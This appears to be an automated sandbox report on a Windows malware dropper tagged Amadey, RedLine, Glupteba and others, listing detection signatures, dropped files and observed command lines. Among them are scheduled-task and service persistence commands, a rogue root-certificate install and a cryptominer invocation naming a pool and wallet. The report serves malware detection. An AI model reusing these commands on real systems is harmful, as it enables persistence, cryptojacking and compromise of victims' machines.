Malware Analysis Report

2024-10-19 02:34

Sample ID 240514-bdrt6sdc67
Target 17ee93b40d1746f9d99cf8521a2ab566.bin
SHA256 5a385c25beb70fc35b900bd712aeb9c5065004b5266ea6591c69c225e9bafae4
Tags
amadey glupteba redline smokeloader xworm 1 backdoor dropper evasion execution infostealer loader persistence rat themida trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5a385c25beb70fc35b900bd712aeb9c5065004b5266ea6591c69c225e9bafae4

Threat Level: Known bad

The file 17ee93b40d1746f9d99cf8521a2ab566.bin was found to be: Known bad.

Malicious Activity Summary

amadey glupteba redline smokeloader xworm 1 backdoor dropper evasion execution infostealer loader persistence rat themida trojan

RedLine

Glupteba payload

Detect Xworm Payload

Xworm

Glupteba

SmokeLoader

RedLine payload

Amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Stops running service(s)

Creates new service(s)

Command and Scripting Interpreter: PowerShell

Themida packer

Checks BIOS information in registry

Identifies Wine through registry keys

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Launches sc.exe

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Program crash

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Modifies system certificate store

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-14 01:02

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-14 01:02

Reported

2024-05-14 01:04

Platform

win7-20240221-en

Max time kernel

26s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe"

Signatures

Amadey

trojan amadey

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Xworm

trojan rat xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A

Creates new service(s)

persistence execution

Downloads MZ/PE file

Stops running service(s)

evasion execution

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameService.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameService.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\Temp\127055.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\GameSyncLink\GameService.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File created C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File opened for modification C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File created C:\Program Files (x86)\GameSyncLink\installg.bat C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File created C:\Program Files (x86)\GameSyncLink\installm.bat C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File created C:\Program Files (x86)\GameSyncLink\GameService.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File opened for modification C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File opened for modification C:\Program Files (x86)\GameSyncLink\installc.bat C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File created C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File opened for modification C:\Program Files (x86)\GameSyncLink\installg.bat C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File opened for modification C:\Program Files (x86)\GameSyncLink\installm.bat C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File created C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File opened for modification C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File created C:\Program Files (x86)\GameSyncLink\installc.bat C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\axplons.job C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1784 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
PID 1784 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
PID 1784 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
PID 1784 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
PID 2560 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
PID 2560 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
PID 2560 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
PID 2560 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
PID 2500 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe C:\Windows\SysWOW64\WerFault.exe
PID 2500 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe C:\Windows\SysWOW64\WerFault.exe
PID 2500 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe C:\Windows\SysWOW64\WerFault.exe
PID 2500 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe C:\Windows\SysWOW64\WerFault.exe
PID 2560 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
PID 2560 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
PID 2560 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
PID 2560 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
PID 1816 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe C:\Windows\SysWOW64\WerFault.exe
PID 1816 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe C:\Windows\SysWOW64\WerFault.exe
PID 1816 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe C:\Windows\SysWOW64\WerFault.exe
PID 1816 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe C:\Windows\SysWOW64\WerFault.exe
PID 2560 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
PID 2560 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
PID 2560 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
PID 2560 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
PID 2560 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
PID 2560 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
PID 2560 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
PID 2560 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
PID 2560 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
PID 2560 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
PID 2560 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
PID 1848 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1848 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1848 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1848 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1848 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1848 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1848 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe C:\Windows\SysWOW64\cmd.exe
PID 2560 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
PID 2560 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
PID 2560 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
PID 2560 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
PID 964 wrote to memory of 596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 964 wrote to memory of 596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 964 wrote to memory of 596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 964 wrote to memory of 596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 964 wrote to memory of 2980 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\GameSyncLink\GameService.exe
PID 964 wrote to memory of 2980 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\GameSyncLink\GameService.exe
PID 964 wrote to memory of 2980 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\GameSyncLink\GameService.exe
PID 964 wrote to memory of 2980 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\GameSyncLink\GameService.exe
PID 964 wrote to memory of 2212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 964 wrote to memory of 2212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 964 wrote to memory of 2212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 964 wrote to memory of 2212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 964 wrote to memory of 2188 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\conhost.exe
PID 964 wrote to memory of 2188 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\conhost.exe
PID 964 wrote to memory of 2188 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\conhost.exe
PID 964 wrote to memory of 2188 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\conhost.exe
PID 1856 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe C:\Windows\SysWOW64\WerFault.exe
PID 1856 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe C:\Windows\SysWOW64\WerFault.exe
PID 1856 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe C:\Windows\SysWOW64\WerFault.exe
PID 1856 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe C:\Windows\SysWOW64\WerFault.exe
PID 964 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\GameSyncLink\GameService.exe
PID 964 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\GameSyncLink\GameService.exe

Processes

C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe

"C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe"

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"

C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe

"C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2500 -s 116

C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe

"C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1816 -s 52

C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe

"C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"

C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe

"C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "

C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe

"C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"

C:\Windows\SysWOW64\sc.exe

Sc stop GameServerClient

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService remove GameServerClient confirm

C:\Windows\SysWOW64\sc.exe

Sc delete GameSyncLink

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService remove GameSyncLink confirm

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1856 -s 52

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService start GameSyncLink

C:\Program Files (x86)\GameSyncLink\GameService.exe

"C:\Program Files (x86)\GameSyncLink\GameService.exe"

C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe

"C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"

C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe

"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"

C:\Windows\Temp\127055.exe

"C:\Windows\Temp\127055.exe" --list-devices

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 52

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "

C:\Windows\SysWOW64\sc.exe

Sc stop GameServerClientC

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService remove GameServerClientC confirm

C:\Windows\SysWOW64\sc.exe

Sc delete PiercingNetLink

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService remove PiercingNetLink confirm

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService start PiercingNetLink

C:\Program Files (x86)\GameSyncLink\GameService.exe

"C:\Program Files (x86)\GameSyncLink\GameService.exe"

C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe

"C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe"

C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe

"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe

"C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "

C:\Windows\SysWOW64\sc.exe

Sc delete GameSyncLinks

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService remove GameSyncLinks confirm

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe

"C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe"

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService start GameSyncLinks

C:\Program Files (x86)\GameSyncLink\GameService.exe

"C:\Program Files (x86)\GameSyncLink\GameService.exe"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-359867078-1201342197352886507-1521795268-1586590423-942573878-2093268082-1318655886"

C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe

"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"

C:\Users\Admin\AppData\Local\Temp\1000255001\toolspub1.exe

"C:\Users\Admin\AppData\Local\Temp\1000255001\toolspub1.exe"

C:\Windows\Temp\728258.exe

"C:\Windows\Temp\728258.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "

C:\Users\Admin\Pictures\R3korVHT4WNZUjkc4bHNZ2rr.exe

"C:\Users\Admin\Pictures\R3korVHT4WNZUjkc4bHNZ2rr.exe"

C:\Users\Admin\Pictures\aFeO3W4FMAYpzXDCQxnEUJVc.exe

